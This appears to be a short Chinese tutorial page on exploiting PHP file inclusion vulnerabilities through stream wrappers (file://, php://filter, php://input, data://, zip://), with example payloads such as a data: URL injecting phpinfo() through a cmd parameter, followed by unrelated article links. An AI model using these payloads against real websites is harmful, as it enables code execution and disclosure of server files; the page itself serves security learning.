当前位置: 首页 > news >正文

文件包含漏洞PHP伪协议利用方法

使用file协议读取Windows的系统文件

使用php://filter协议可以将php代码进行base64编码后显示出来

php://input

抓包,并加上<?php phpinfo() ?>

data://

?cmd=data:text/plain,<?php%20phpinfo();?>

zip://

读取压缩包内的⽂件

?cmd=zip://d:/3.zip/3.txt

相关文章:

  • 北京网站建设多少钱?
  • 辽宁网页制作哪家好_网站建设
  • 高端品牌网站建设_汉中网站制作
  • Mac 安装 jdk 8详细教程
  • 有限体积法:基于一维稳态扩散问题及其程序实现
  • 计算机网络 第2章 物理层
  • 农产品自主供销系统小程序的设计
  • 94.游戏的启动与多开-互斥量对开检测
  • 同三维S61-20SDI 20倍 HDMI SDI USB3.0 网口 3高清摄像机
  • Azure AI Search 中的二进制量化:优化存储和加快搜索速度
  • 【MySQL】索引使用规则——(覆盖索引,单列索引,联合索引,前缀索引,SQL提示,数据分布影响,查询失效情况)
  • python07-单元测试框架unittest1-1
  • JS都有哪些操作数组的方法
  • JS简介 JS特点
  • 用ceres实现lio-sam平面点匹配
  • python开发VTK入门
  • Amazon QuickSight 实验
  • 秋招突击——算法练习——8/26——图论——200-岛屿数量、994-腐烂的橘子、207-课程表、208-实现Trie
  • [译] React v16.8: 含有Hooks的版本
  • Angular数据绑定机制
  • docker python 配置
  • js 实现textarea输入字数提示
  • Laravel 中的一个后期静态绑定
  • rabbitmq延迟消息示例
  • ReactNative开发常用的三方模块
  • Service Worker
  • Spring Security中异常上抛机制及对于转型处理的一些感悟
  • WebSocket使用
  • 爱情 北京女病人
  • 编写符合Python风格的对象
  • 从零开始学习部署
  • 力扣(LeetCode)21
  • 码农张的Bug人生 - 见面之礼
  • 视频flv转mp4最快的几种方法(就是不用格式工厂)
  • 小李飞刀:SQL题目刷起来!
  • 由插件封装引出的一丢丢思考
  • 进程与线程(三)——进程/线程间通信
  • ​DB-Engines 12月数据库排名: PostgreSQL有望获得「2020年度数据库」荣誉?
  • ​LeetCode解法汇总2182. 构造限制重复的字符串
  • ​ubuntu下安装kvm虚拟机
  • ​无人机石油管道巡检方案新亮点:灵活准确又高效
  • # Redis 入门到精通(八)-- 服务器配置-redis.conf配置与高级数据类型
  • # 深度解析 Socket 与 WebSocket:原理、区别与应用
  • ###C语言程序设计-----C语言学习(6)#
  • #define 用法
  • #includecmath
  • #我与Java虚拟机的故事#连载09:面试大厂逃不过的JVM
  • %3cscript放入php,跟bWAPP学WEB安全(PHP代码)--XSS跨站脚本攻击
  • (cljs/run-at (JSVM. :browser) 搭建刚好可用的开发环境!)
  • (ibm)Java 语言的 XPath API
  • (LeetCode C++)盛最多水的容器
  • (ZT)北大教授朱青生给学生的一封信:大学,更是一个科学的保证
  • (附源码)计算机毕业设计ssm电影分享网站
  • (论文阅读40-45)图像描述1
  • (转)淘淘商城系列——使用Spring来管理Redis单机版和集群版
  • (转载)微软数据挖掘算法:Microsoft 时序算法(5)
  • .bat批处理(三):变量声明、设置、拼接、截取
  • .JPG图片,各种压缩率下的文件尺寸